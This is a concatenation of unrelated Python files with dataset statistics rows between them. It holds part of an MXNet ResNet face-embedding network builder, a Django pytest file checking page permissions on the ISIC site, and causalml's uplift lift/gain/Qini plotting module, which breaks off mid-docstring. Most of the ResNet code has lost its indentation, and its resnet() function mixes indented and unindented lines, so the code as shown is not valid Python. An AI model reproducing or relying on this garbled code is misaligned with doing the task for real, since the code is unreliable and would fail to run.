body = mx.symbol.Activation(data=body, act_type='sigmoid', name=name+"_se_sigmoid")
conv2 = mx.symbol.broadcast_mul(conv2, body)
if dim_match:
shortcut = data
else:
shortcut = Conv(data=act1, num_filter=num_filter, kernel=(1,1), stride=stride, no_bias=True,
workspace=workspace, name=name+'_sc')
if memonger:
shortcut._set_attr(mirror_stage='True')
return conv2 + shortcut
def residual_unit_v3(data, num_filter, stride, dim_match, name, bottle_neck, **kwargs):
"""Return ResNet Unit symbol for building ResNet
Parameters
----------
data : str
Input data
num_filter : int
Number of output channels
bnf : int
Bottle neck channels factor with regard to num_filter
stride : tuple
Stride used in convolution
dim_match : Boolean
True means channel number between input and output is the same, otherwise means differ
name : str
Base name of the operators
workspace : int
Workspace used in convolution operator
"""
use_se = kwargs.get('version_se', 1)
bn_mom = kwargs.get('bn_mom', 0.9)
workspace = kwargs.get('workspace', 256)
memonger = kwargs.get('memonger', False)
act_type = kwargs.get('version_act', 'prelu')
#print('in unit3')
if bottle_neck:
bn1 = mx.sym.BatchNorm(data=data, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn1')
conv1 = Conv(data=bn1, num_filter=int(num_filter*0.25), kernel=(1,1), stride=(1,1), pad=(0,0),
no_bias=True, workspace=workspace, name=name + '_conv1')
bn2 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn2')
act1 = Act(data=bn2, act_type=act_type, name=name + '_relu1')
conv2 = Conv(data=act1, num_filter=int(num_filter*0.25), kernel=(3,3), stride=(1,1), pad=(1,1),
no_bias=True, workspace=workspace, name=name + '_conv2')
bn3 = mx.sym.BatchNorm(data=conv2, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn3')
act2 = Act(data=bn3, act_type=act_type, name=name + '_relu2')
conv3 = Conv(data=act2, num_filter=num_filter, kernel=(1,1), stride=stride, pad=(0,0), no_bias=True,
workspace=workspace, name=name + '_conv3')
bn4 = mx.sym.BatchNorm(data=conv3, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn4')
if use_se:
#se begin
body = mx.sym.Pooling(data=bn4, global_pool=True, kernel=(7, 7), pool_type='avg', name=name+'_se_pool1')
body = Conv(data=body, num_filter=num_filter//16, kernel=(1,1), stride=(1,1), pad=(0,0),
name=name+"_se_conv1", workspace=workspace)
body = Act(data=body, act_type=act_type, name=name+'_se_relu1')
body = Conv(data=body, num_filter=num_filter, kernel=(1,1), stride=(1,1), pad=(0,0),
name=name+"_se_conv2", workspace=workspace)
body = mx.symbol.Activation(data=body, act_type='sigmoid', name=name+"_se_sigmoid")
bn4 = mx.symbol.broadcast_mul(bn4, body)
#se end
if dim_match:
shortcut = data
else:
conv1sc = Conv(data=data, num_filter=num_filter, kernel=(1,1), stride=stride, no_bias=True,
workspace=workspace, name=name+'_conv1sc')
shortcut = mx.sym.BatchNorm(data=conv1sc, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_sc')
if memonger:
shortcut._set_attr(mirror_stage='True')
return bn4 + shortcut
else:
bn1 = mx.sym.BatchNorm(data=data, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn1')
conv1 = Conv(data=bn1, num_filter=num_filter, kernel=(3,3), stride=(1,1), pad=(1,1),
no_bias=True, workspace=workspace, name=name + '_conv1')
bn2 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn2')
act1 = Act(data=bn2, act_type=act_type, name=name + '_relu1')
conv2 = Conv(data=act1, num_filter=num_filter, kernel=(3,3), stride=stride, pad=(1,1),
no_bias=True, workspace=workspace, name=name + '_conv2')
bn3 = mx.sym.BatchNorm(data=conv2, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn3')
if use_se:
#se begin
body = mx.sym.Pooling(data=bn3, global_pool=True, kernel=(7, 7), pool_type='avg', name=name+'_se_pool1')
body = Conv(data=body, num_filter=num_filter//16, kernel=(1,1), stride=(1,1), pad=(0,0),
name=name+"_se_conv1", workspace=workspace)
body = Act(data=body, act_type=act_type, name=name+'_se_relu1')
body = Conv(data=body, num_filter=num_filter, kernel=(1,1), stride=(1,1), pad=(0,0),
name=name+"_se_conv2", workspace=workspace)
body = mx.symbol.Activation(data=body, act_type='sigmoid', name=name+"_se_sigmoid")
bn3 = mx.symbol.broadcast_mul(bn3, body)
#se end
if dim_match:
shortcut = data
else:
conv1sc = Conv(data=data, num_filter=num_filter, kernel=(1,1), stride=stride, no_bias=True,
workspace=workspace, name=name+'_conv1sc')
shortcut = mx.sym.BatchNorm(data=conv1sc, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_sc')
if memonger:
shortcut._set_attr(mirror_stage='True')
return bn3 + shortcut
def residual_unit_v3_x(data, num_filter, stride, dim_match, name, bottle_neck, **kwargs):
"""Return ResNeXt Unit symbol for building ResNeXt
Parameters
----------
data : str
Input data
num_filter : int
Number of output channels
    bnf : int
        Bottleneck channel scaling factor relative to num_filter
    stride : tuple
        Stride used in convolution
    dim_match : Boolean
        True means the number of channels of input and output is the same, otherwise they differ
name : str
Base name of the operators
workspace : int
Workspace used in convolution operator
"""
assert(bottle_neck)
use_se = kwargs.get('version_se', 1)
bn_mom = kwargs.get('bn_mom', 0.9)
workspace = kwargs.get('workspace', 256)
memonger = kwargs.get('memonger', False)
act_type = kwargs.get('version_act', 'prelu')
num_group = 32
#print('in unit3')
bn1 = mx.sym.BatchNorm(data=data, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn1')
conv1 = Conv(data=bn1, num_group=num_group, num_filter=int(num_filter*0.5), kernel=(1,1), stride=(1,1), pad=(0,0),
no_bias=True, workspace=workspace, name=name + '_conv1')
bn2 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn2')
act1 = Act(data=bn2, act_type=act_type, name=name + '_relu1')
conv2 = Conv(data=act1, num_group=num_group, num_filter=int(num_filter*0.5), kernel=(3,3), stride=(1,1), pad=(1,1),
no_bias=True, workspace=workspace, name=name + '_conv2')
bn3 = mx.sym.BatchNorm(data=conv2, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn3')
act2 = Act(data=bn3, act_type=act_type, name=name + '_relu2')
conv3 = Conv(data=act2, num_filter=num_filter, kernel=(1,1), stride=stride, pad=(0,0), no_bias=True,
workspace=workspace, name=name + '_conv3')
bn4 = mx.sym.BatchNorm(data=conv3, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn4')
if use_se:
#se begin
body = mx.sym.Pooling(data=bn4, global_pool=True, kernel=(7, 7), pool_type='avg', name=name+'_se_pool1')
body = Conv(data=body, num_filter=num_filter//16, kernel=(1,1), stride=(1,1), pad=(0,0),
name=name+"_se_conv1", workspace=workspace)
body = Act(data=body, act_type=act_type, name=name+'_se_relu1')
body = Conv(data=body, num_filter=num_filter, kernel=(1,1), stride=(1,1), pad=(0,0),
name=name+"_se_conv2", workspace=workspace)
body = mx.symbol.Activation(data=body, act_type='sigmoid', name=name+"_se_sigmoid")
bn4 = mx.symbol.broadcast_mul(bn4, body)
#se end
if dim_match:
shortcut = data
else:
conv1sc = Conv(data=data, num_filter=num_filter, kernel=(1,1), stride=stride, no_bias=True,
workspace=workspace, name=name+'_conv1sc')
shortcut = mx.sym.BatchNorm(data=conv1sc, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_sc')
if memonger:
shortcut._set_attr(mirror_stage='True')
return bn4 + shortcut
def residual_unit(data, num_filter, stride, dim_match, name, bottle_neck, **kwargs):
uv = kwargs.get('version_unit', 3)
version_input = kwargs.get('version_input', 1)
if uv==1:
if version_input==0:
return residual_unit_v1(data, num_filter, stride, dim_match, name, bottle_neck, **kwargs)
else:
return residual_unit_v1_L(data, num_filter, stride, dim_match, name, bottle_neck, **kwargs)
elif uv==2:
return residual_unit_v2(data, num_filter, stride, dim_match, name, bottle_neck, **kwargs)
elif uv==4:
return residual_unit_v4(data, num_filter, stride, dim_match, name, bottle_neck, **kwargs)
else:
return residual_unit_v3(data, num_filter, stride, dim_match, name, bottle_neck, **kwargs)
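# Illustrative sketch (added for clarity, not part of the original network code):
# how a single unit is dispatched through residual_unit(). The kwargs keys mirror
# the config-driven dict that resnet() builds below; all concrete values here are
# placeholder assumptions.
def _example_residual_unit():
    data = mx.sym.Variable(name='data')
    unit_kwargs = {'version_unit': 3, 'version_input': 1, 'version_se': 1,
                   'version_act': 'prelu', 'bn_mom': 0.9, 'workspace': 256,
                   'memonger': False}
    # version_unit=3 routes to residual_unit_v3; bottle_neck=False selects the
    # two-conv (3x3/3x3) pre-activation branch with an SE block.
    return residual_unit(data, num_filter=64, stride=(1, 1), dim_match=True,
                         name='stage1_unit1', bottle_neck=False, **unit_kwargs)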
def resnet(units, num_stages, filter_list, num_classes, bottle_neck):
    """Return ResNet symbol of
    Parameters
    ----------
    units : list
        Number of units in each stage
    num_stages : int
        Number of stages
    filter_list : list
        Channel size of each stage
    num_classes : int
        Output size of symbol
    dataset : str
        Dataset type, only cifar10 and imagenet are supported
    workspace : int
        Workspace used in convolution operator
    """
    bn_mom = config.bn_mom
    workspace = config.workspace
    kwargs = {'version_se' : config.net_se,
              'version_input': config.net_input,
              'version_output': config.net_output,
              'version_unit': config.net_unit,
              'version_act': config.net_act,
              'bn_mom': bn_mom,
              'workspace': workspace,
              'memonger': config.memonger,
              }
version_se = kwargs.get('version_se', 1)
version_input = kwargs.get('version_input', 1)
assert version_input>=0
version_output = kwargs.get('version_output', 'E')
fc_type = version_output
version_unit = kwargs.get('version_unit', 3)
act_type = kwargs.get('version_act', 'prelu')
memonger = kwargs.get('memonger', False)
print(version_se, version_input, version_output, version_unit, act_type, memonger)
num_unit = len(units)
assert(num_unit == num_stages)
data = mx.sym.Variable(name='data')
if version_input==0:
#data = mx.sym.BatchNorm(data=data, fix_gamma=True, eps=2e-5, momentum=bn_mom, name='bn_data')
data = mx.sym.identity(data=data, name='id')
data = data-127.5
data = data*0.0078125
body = Conv(data=data, num_filter=filter_list[0], kernel=(7, 7), stride=(2,2), pad=(3, 3),
no_bias=True, name="conv0", workspace=workspace)
body = mx.sym.BatchNorm(data=body, fix_gamma=False, eps=2e-5, momentum=bn_mom, name='bn0')
body = Act(data=body, act_type=act_type, name='relu0')
#body = mx.sym.Pooling(data=body, kernel=(3, 3), stride=(2,2), pad=(1,1), pool_type='max')
elif version_input==2:
data = mx.sym.BatchNorm(data=data, fix_gamma=True, eps=2e-5, momentum=bn_mom, name='bn_data')
body = Conv(data=data, num_filter=filter_list[0], kernel=(3,3), stride=(1,1), pad=(1,1),
no_bias=True, name="conv0", workspace=workspace)
body = mx.sym.BatchNorm(data=body, fix_gamma=False, eps=2e-5, momentum=bn_mom, name='bn0')
body = Act(data=body, act_type=act_type, name='relu0')
else:
data = mx.sym.identity(data=data, name='id')
data = data-127.5
data = data*0.0078125
body = data
body = Conv(data=body, num_filter=filter_list[0], kernel=(7,7), stride=(2,2), pad=(1, 1),
no_bias=True, name="conv0", workspace=workspace)
body = mx.sym.BatchNorm(data=body, fix_gamma=False, eps=2e-5, momentum=bn_mom, name='bn0')
body = Act(data=body, act_type=act_type, name='relu0')
for i in range(num_stages):
#if version_input==0:
# body = residual_unit(body, filter_list[i+1], (1 if i==0 else 2, 1 if i==0 else 2), False,
# name='stage%d_unit%d' % (i + 1, 1), bottle_neck=bottle_neck, **kwargs)
#else:
# body = residual_unit(body, filter_list[i+1], (2, 2), False,
# name='stage%d_unit%d' % (i + 1, 1), bottle_neck=bottle_neck, **kwargs)
body = residual_unit(body, filter_list[i+1], (2, 2), False,
name='stage%d_unit%d' % (i + 1, 1), bottle_neck=bottle_neck, **kwargs)
for j in range(units[i]-1):
body = residual_unit(body, filter_list[i+1], (1,1), True, name='stage%d_unit%d' % (i+1, j+2),
bottle_neck=bottle_neck, **kwargs)
if bottle_neck:
body = Conv(data=body, num_filter=512, kernel=(1,1), stride=(1,1), pad=(0,0),
no_bias=True, name="convd", workspace=workspace)
body = mx.sym.BatchNorm(data=body, fix_gamma=False, eps=2e-5, momentum=bn_mom, name='bnd')
body = Act(data=body, act_type=act_type, name='relud')
fc1 = symbol_utils.get_fc1(body, num_classes, fc_type)
return fc1
def get_symbol():
"""
Adapted from https://github.com/tornadomeet/ResNet/blob/master/train_resnet.py
Original author Wei Wu
"""
num_classes = config.emb_size
num_layers = config.num_layers
if num_layers >= 500:
filter_list = [64, 256, 512, 1024, 2048]
bottle_neck = True
else:
filter_list = [64, 64, 128, 256, 512]
bottle_neck = False
num_stages = 4
if num_layers == 18:
units = [2, 2, 2, 2]
elif num_layers == 34:
units = [3, 4, 6, 3]
    elif num_layers == 49 or num_layers == 50:
        units = [3, 4, 14, 3]
elif num_layers == 74:
units = [3, 6, 24, 3]
elif num_layers == 90:
units = [3, 8, 30, 3]
elif num_layers == 98:
units = [3, 4, 38, 3]
elif num_layers == 99:
units = [3, 8, 35, 3]
elif num_layers == 100:
units = [3, 13, 30, 3]
elif num_layers == 134:
units = [3, 10, 50, 3]
elif num_layers == 136:
units = [3, 13, 48, 3]
elif num_layers == 140:
units = [3, 15, 48, 3]
elif num_layers == 124:
units = [3, 13, 40, 5]
elif num_layers == 160:
units = [3, 24, 49, 3]
elif num_layers == 101:
units = [3, 4, 23, 3]
elif num_layers == 152:
units = [3, 8, 36, 3]
elif num_layers == 200:
units = [3, 24, 36, 3]
elif num_layers == 269:
units = [3, 30, 48, 8]
else:
raise ValueError("no experiments done on num_layers {}, you can do it yourself".format(num_layers))
net = resnet(units = units,
num_stages = num_stages,
filter_list = filter_list,
num_classes = num_classes,
bottle_neck = bottle_neck)
if config.memonger:
dshape = (config.per_batch_size, config.image_shape[2], config.image_shape[0], config.image_shape[1])
net_mem_planned = memonger.search_plan(net, data=dshape)
old_cost = memonger.get_cost(net, data=dshape)
new_cost = memonger.get_cost(net_mem_planned, data=dshape)
print('Old feature map cost=%d MB' % old_cost)
print('New feature map cost=%d MB' % new_cost)
net = net_mem_planned
return net
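# Usage sketch (illustrative, not part of the original module): get_symbol()
# reads everything from the global `config` object, so it only needs config to
# be populated first. The 112x112 input shape below is an assumption, not
# something this module enforces.
def _example_get_symbol():
    sym = get_symbol()
    arg_shapes, out_shapes, aux_shapes = sym.infer_shape(data=(1, 3, 112, 112))
    return out_shapes  # e.g. [(1, config.emb_size)]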
| 50.645609 | 119 | 0.610301 | 4,656 | 32,869 | 4.131229 | 0.075172 | 0.0549 | 0.023395 | 0.037432 | 0.822771 | 0.804367 | 0.795581 | 0.786899 | 0.784507 | 0.77229 | 0 | 0.041585 | 0.255225 | 32,869 | 648 | 120 | 50.723765 | 0.744159 | 0.135416 | 0 | 0.647191 | 0 | 0 | 0.059522 | 0 | 0 | 0 | 0 | 0 | 0.006742 | 1 | 0.022472 | false | 0 | 0.024719 | 0 | 0.08764 | 0.008989 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
8a1110f3dc64ccdaef7a1555b9cbcf9cf6d139ec | 2,519 | py | Python | isic/core/tests/test_permissions.py | ImageMarkup/isic | 607b2b103d0d2a67adb61f8ea88f1461c85ec8f3 | [
"Apache-2.0"
] | null | null | null | isic/core/tests/test_permissions.py | ImageMarkup/isic | 607b2b103d0d2a67adb61f8ea88f1461c85ec8f3 | [
"Apache-2.0"
] | 18 | 2021-06-10T05:14:34.000Z | 2022-03-22T02:15:59.000Z | isic/core/tests/test_permissions.py | ImageMarkup/isic | 607b2b103d0d2a67adb61f8ea88f1461c85ec8f3 | [
"Apache-2.0"
] | null | null | null | from django.urls.base import reverse
import pytest
from pytest_django.asserts import assertQuerysetEqual
@pytest.mark.django_db
def test_core_stats(client):
r = client.get(reverse('core/stats'))
assert r.status_code == 200
@pytest.mark.django_db
def test_core_api_stats(client):
r = client.get(reverse('core/api/stats'))
assert r.status_code == 200
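# The permission tests below follow a three-way pattern: anonymous clients are
# redirected to login (302), authenticated non-staff users are forbidden (403),
# and staff users succeed (200).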
@pytest.mark.django_db
def test_core_staff_list(client, authenticated_client, staff_client):
r = client.get(reverse('core/staff-list'))
assert r.status_code == 302
r = authenticated_client.get(reverse('core/staff-list'))
assert r.status_code == 403
r = staff_client.get(reverse('core/staff-list'))
assert r.status_code == 200
@pytest.mark.django_db
def test_core_collection_list(client, authenticated_client, staff_client, private_collection):
r = client.get(reverse('core/collection-list'))
assertQuerysetEqual(r.context['collections'].object_list, [])
r = authenticated_client.get(reverse('core/collection-list'))
assertQuerysetEqual(r.context['collections'].object_list, [])
r = staff_client.get(reverse('core/collection-list'))
assertQuerysetEqual(r.context['collections'].object_list, [private_collection])
@pytest.mark.django_db
def test_core_collection_detail(client, authenticated_client, staff_client, private_collection):
r = client.get(reverse('core/collection-detail', args=[private_collection.pk]))
assert r.status_code == 302
r = authenticated_client.get(reverse('core/collection-detail', args=[private_collection.pk]))
assert r.status_code == 403
r = staff_client.get(reverse('core/collection-detail', args=[private_collection.pk]))
assert r.status_code == 200
@pytest.mark.django_db
def test_core_collection_detail_filters_contributors(
client, authenticated_client, staff_client, public_collection, image_factory
):
image = image_factory(public=True)
public_collection.images.add(image)
r = client.get(reverse('core/collection-detail', args=[public_collection.pk]))
assert r.status_code == 200
assert list(r.context['contributors']) == []
r = authenticated_client.get(reverse('core/collection-detail', args=[public_collection.pk]))
assert r.status_code == 200
assert list(r.context['contributors']) == []
r = staff_client.get(reverse('core/collection-detail', args=[public_collection.pk]))
assert r.status_code == 200
assert list(r.context['contributors']) == [image.accession.cohort.contributor]
| 35.478873 | 97 | 0.745137 | 332 | 2,519 | 5.445783 | 0.141566 | 0.06969 | 0.123894 | 0.154867 | 0.859513 | 0.839602 | 0.814712 | 0.753319 | 0.752765 | 0.714602 | 0 | 0.014952 | 0.123859 | 2,519 | 70 | 98 | 35.985714 | 0.804259 | 0 | 0 | 0.42 | 0 | 0 | 0.131004 | 0.052402 | 0 | 0 | 0 | 0 | 0.36 | 1 | 0.12 | false | 0 | 0.06 | 0 | 0.18 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
8a3a1a84f8c5fe040e093def84496da5d902ecf3 | 15,828 | py | Python | causalml/metrics/visualize.py | LeihuaYe/causalml | 900df2de0e5a3e999c290f5849c2cb3367f5ad5a | [
"Apache-2.0"
] | 1 | 2019-12-29T03:05:10.000Z | 2019-12-29T03:05:10.000Z | causalml/metrics/visualize.py | CZZLEGEND/causalml | 900df2de0e5a3e999c290f5849c2cb3367f5ad5a | [
"Apache-2.0"
] | null | null | null | causalml/metrics/visualize.py | CZZLEGEND/causalml | 900df2de0e5a3e999c290f5849c2cb3367f5ad5a | [
"Apache-2.0"
] | null | null | null | from matplotlib import pyplot as plt
import numpy as np
import pandas as pd
import seaborn as sns
plt.style.use('fivethirtyeight')
sns.set_palette("Paired")
RANDOM_COL = 'Random'
def plot(df, kind='gain', n=100, figsize=(8, 8), *args, **kwarg):
"""Plot one of the lift/gain/Qini charts of model estimates.
    A factory method for `plot_lift()`, `plot_gain()` and `plot_qini()`. For details, please see the docstring of each
function.
Args:
df (pandas.DataFrame): a data frame with model estimates and actual data as columns.
kind (str, optional): the kind of plot to draw. 'lift', 'gain', and 'qini' are supported.
n (int, optional): the number of samples to be used for plotting.
"""
catalog = {'lift': get_cumlift,
'gain': get_cumgain,
'qini': get_qini}
assert kind in catalog.keys(), '{} plot is not implemented. Select one of {}'.format(kind, catalog.keys())
df = catalog[kind](df, *args, **kwarg)
if (n is not None) and (n < df.shape[0]):
df = df.iloc[np.linspace(0, df.index[-1], n, endpoint=True)]
df.plot(figsize=figsize)
plt.xlabel('Population')
plt.ylabel('{}'.format(kind.title()))
def get_cumlift(df, outcome_col='y', treatment_col='w', treatment_effect_col='tau',
random_seed=42):
"""Get average uplifts of model estimates in cumulative population.
If the true treatment effect is provided (e.g. in synthetic data), it's calculated
as the mean of the true treatment effect in each of cumulative population.
Otherwise, it's calculated as the difference between the mean outcomes of the
treatment and control groups in each of cumulative population.
For details, see Section 4.1 of Gutierrez and G{\'e}rardy (2016), `Causal Inference
and Uplift Modeling: A review of the literature`.
For the former, `treatment_effect_col` should be provided. For the latter, both
`outcome_col` and `treatment_col` should be provided.
Args:
df (pandas.DataFrame): a data frame with model estimates and actual data as columns
outcome_col (str, optional): the column name for the actual outcome
treatment_col (str, optional): the column name for the treatment indicator (0 or 1)
treatment_effect_col (str, optional): the column name for the true treatment effect
random_seed (int, optional): random seed for numpy.random.rand()
Returns:
(pandas.DataFrame): average uplifts of model estimates in cumulative population
"""
assert ((outcome_col in df.columns) and (treatment_col in df.columns) or
treatment_effect_col in df.columns)
df = df.copy()
np.random.seed(random_seed)
random_cols = []
for i in range(10):
random_col = '__random_{}__'.format(i)
df[random_col] = np.random.rand(df.shape[0])
random_cols.append(random_col)
model_names = [x for x in df.columns if x not in [outcome_col, treatment_col,
treatment_effect_col]]
lift = []
for i, col in enumerate(model_names):
df = df.sort_values(col, ascending=False).reset_index(drop=True)
df.index = df.index + 1
if treatment_effect_col in df.columns:
# When treatment_effect_col is given, use it to calculate the average treatment effects
# of cumulative population.
lift.append(df[treatment_effect_col].cumsum() / df.index)
else:
# When treatment_effect_col is not given, use outcome_col and treatment_col
# to calculate the average treatment_effects of cumulative population.
df['cumsum_tr'] = df[treatment_col].cumsum()
df['cumsum_ct'] = df.index.values - df['cumsum_tr']
df['cumsum_y_tr'] = (df[outcome_col] * df[treatment_col]).cumsum()
df['cumsum_y_ct'] = (df[outcome_col] * (1 - df[treatment_col])).cumsum()
lift.append(df['cumsum_y_tr'] / df['cumsum_tr'] - df['cumsum_y_ct'] / df['cumsum_ct'])
lift = pd.concat(lift, join='inner', axis=1)
lift.loc[0] = np.zeros((lift.shape[1], ))
lift = lift.sort_index().interpolate()
lift.columns = model_names
lift[RANDOM_COL] = lift[random_cols].mean(axis=1)
lift.drop(random_cols, axis=1, inplace=True)
return lift
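# Minimal usage sketch (illustrative, not part of the library): the frame needs
# one column per model score plus either the outcome/treatment columns or a
# true-effect column. Supplying 'tau' here keeps the function on the exact
# treatment-effect branch; all values are synthetic assumptions.
def _example_get_cumlift():
    rng = np.random.RandomState(0)
    df = pd.DataFrame({'model_a': rng.rand(100),
                       'tau': rng.normal(0.1, 1.0, 100)})
    # Returns a frame with one cumulative-lift column per model plus 'Random'.
    return get_cumlift(df)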
def get_cumgain(df, outcome_col='y', treatment_col='w', treatment_effect_col='tau',
normalize=False, random_seed=42):
"""Get cumulative gains of model estimates in population.
If the true treatment effect is provided (e.g. in synthetic data), it's calculated
as the cumulative gain of the true treatment effect in each population.
Otherwise, it's calculated as the cumulative difference between the mean outcomes
of the treatment and control groups in each population.
For details, see Section 4.1 of Gutierrez and G{\'e}rardy (2016), `Causal Inference
and Uplift Modeling: A review of the literature`.
For the former, `treatment_effect_col` should be provided. For the latter, both
`outcome_col` and `treatment_col` should be provided.
Args:
df (pandas.DataFrame): a data frame with model estimates and actual data as columns
outcome_col (str, optional): the column name for the actual outcome
treatment_col (str, optional): the column name for the treatment indicator (0 or 1)
treatment_effect_col (str, optional): the column name for the true treatment effect
normalize (bool, optional): whether to normalize the y-axis to 1 or not
random_seed (int, optional): random seed for numpy.random.rand()
Returns:
(pandas.DataFrame): cumulative gains of model estimates in population
"""
lift = get_cumlift(df, outcome_col, treatment_col, treatment_effect_col, random_seed)
# cumulative gain = cumulative lift x (# of population)
gain = lift.mul(lift.index.values, axis=0)
if normalize:
gain = gain.div(gain.iloc[-1, :], axis=1)
return gain
def get_qini(df, outcome_col='y', treatment_col='w', treatment_effect_col='tau',
normalize=False, random_seed=42):
"""Get Qini of model estimates in population.
If the true treatment effect is provided (e.g. in synthetic data), it's calculated
as the cumulative gain of the true treatment effect in each population.
Otherwise, it's calculated as the cumulative difference between the mean outcomes
of the treatment and control groups in each population.
For details, see Radcliffe (2007), `Using Control Group to Target on Predicted Lift:
Building and Assessing Uplift Models`
For the former, `treatment_effect_col` should be provided. For the latter, both
`outcome_col` and `treatment_col` should be provided.
Args:
df (pandas.DataFrame): a data frame with model estimates and actual data as columns
outcome_col (str, optional): the column name for the actual outcome
treatment_col (str, optional): the column name for the treatment indicator (0 or 1)
treatment_effect_col (str, optional): the column name for the true treatment effect
normalize (bool, optional): whether to normalize the y-axis to 1 or not
random_seed (int, optional): random seed for numpy.random.rand()
Returns:
(pandas.DataFrame): cumulative gains of model estimates in population
"""
assert ((outcome_col in df.columns) and (treatment_col in df.columns) or
treatment_effect_col in df.columns)
df = df.copy()
np.random.seed(random_seed)
random_cols = []
for i in range(10):
random_col = '__random_{}__'.format(i)
df[random_col] = np.random.rand(df.shape[0])
random_cols.append(random_col)
model_names = [x for x in df.columns if x not in [outcome_col, treatment_col,
treatment_effect_col]]
qini = []
for i, col in enumerate(model_names):
df = df.sort_values(col, ascending=False).reset_index(drop=True)
df.index = df.index + 1
df['cumsum_tr'] = df[treatment_col].cumsum()
if treatment_effect_col in df.columns:
# When treatment_effect_col is given, use it to calculate the average treatment effects
# of cumulative population.
l = df[treatment_effect_col].cumsum() / df.index * df['cumsum_tr']
else:
# When treatment_effect_col is not given, use outcome_col and treatment_col
# to calculate the average treatment_effects of cumulative population.
df['cumsum_ct'] = df.index.values - df['cumsum_tr']
df['cumsum_y_tr'] = (df[outcome_col] * df[treatment_col]).cumsum()
df['cumsum_y_ct'] = (df[outcome_col] * (1 - df[treatment_col])).cumsum()
l = df['cumsum_y_tr'] - df['cumsum_y_ct'] * df['cumsum_tr'] / df['cumsum_ct']
qini.append(l)
qini = pd.concat(qini, join='inner', axis=1)
qini.loc[0] = np.zeros((qini.shape[1], ))
qini = qini.sort_index().interpolate()
qini.columns = model_names
qini[RANDOM_COL] = qini[random_cols].mean(axis=1)
qini.drop(random_cols, axis=1, inplace=True)
if normalize:
qini = qini.div(qini.iloc[-1, :], axis=1)
return qini
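# Note (added for clarity): unlike get_cumgain, which multiplies the average
# uplift by the cumulative population size, the Qini curve rescales the
# control-group outcome by the ratio of cumulative treated to control counts
# before taking the difference.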
def plot_gain(df, outcome_col='y', treatment_col='w', treatment_effect_col='tau',
normalize=False, random_seed=42, n=100, figsize=(8, 8)):
"""Plot the cumulative gain chart (or uplift curve) of model estimates.
If the true treatment effect is provided (e.g. in synthetic data), it's calculated
as the cumulative gain of the true treatment effect in each population.
Otherwise, it's calculated as the cumulative difference between the mean outcomes
of the treatment and control groups in each population.
For details, see Section 4.1 of Gutierrez and G{\'e}rardy (2016), `Causal Inference
and Uplift Modeling: A review of the literature`.
For the former, `treatment_effect_col` should be provided. For the latter, both
`outcome_col` and `treatment_col` should be provided.
Args:
df (pandas.DataFrame): a data frame with model estimates and actual data as columns
outcome_col (str, optional): the column name for the actual outcome
treatment_col (str, optional): the column name for the treatment indicator (0 or 1)
treatment_effect_col (str, optional): the column name for the true treatment effect
normalize (bool, optional): whether to normalize the y-axis to 1 or not
random_seed (int, optional): random seed for numpy.random.rand()
n (int, optional): the number of samples to be used for plotting
"""
plot(df, kind='gain', n=n, figsize=figsize, outcome_col=outcome_col, treatment_col=treatment_col,
treatment_effect_col=treatment_effect_col, normalize=normalize, random_seed=random_seed)
def plot_lift(df, outcome_col='y', treatment_col='w', treatment_effect_col='tau',
random_seed=42, n=100, figsize=(8, 8)):
"""Plot the lift chart of model estimates in cumulative population.
If the true treatment effect is provided (e.g. in synthetic data), it's calculated
as the mean of the true treatment effect in each of cumulative population.
Otherwise, it's calculated as the difference between the mean outcomes of the
treatment and control groups in each of cumulative population.
For details, see Section 4.1 of Gutierrez and G{\'e}rardy (2016), `Causal Inference
and Uplift Modeling: A review of the literature`.
For the former, `treatment_effect_col` should be provided. For the latter, both
`outcome_col` and `treatment_col` should be provided.
Args:
df (pandas.DataFrame): a data frame with model estimates and actual data as columns
outcome_col (str, optional): the column name for the actual outcome
treatment_col (str, optional): the column name for the treatment indicator (0 or 1)
treatment_effect_col (str, optional): the column name for the true treatment effect
random_seed (int, optional): random seed for numpy.random.rand()
n (int, optional): the number of samples to be used for plotting
"""
plot(df, kind='lift', n=n, figsize=figsize, outcome_col=outcome_col, treatment_col=treatment_col,
treatment_effect_col=treatment_effect_col, random_seed=random_seed)
def plot_qini(df, outcome_col='y', treatment_col='w', treatment_effect_col='tau',
normalize=False, random_seed=42, n=100, figsize=(8, 8)):
"""Plot the Qini chart (or uplift curve) of model estimates.
If the true treatment effect is provided (e.g. in synthetic data), it's calculated
as the cumulative gain of the true treatment effect in each population.
Otherwise, it's calculated as the cumulative difference between the mean outcomes
of the treatment and control groups in each population.
For details, see Radcliffe (2007), `Using Control Group to Target on Predicted Lift:
Building and Assessing Uplift Models`
For the former, `treatment_effect_col` should be provided. For the latter, both
`outcome_col` and `treatment_col` should be provided.
Args:
df (pandas.DataFrame): a data frame with model estimates and actual data as columns
outcome_col (str, optional): the column name for the actual outcome
treatment_col (str, optional): the column name for the treatment indicator (0 or 1)
treatment_effect_col (str, optional): the column name for the true treatment effect
normalize (bool, optional): whether to normalize the y-axis to 1 or not
random_seed (int, optional): random seed for numpy.random.rand()
n (int, optional): the number of samples to be used for plotting
"""
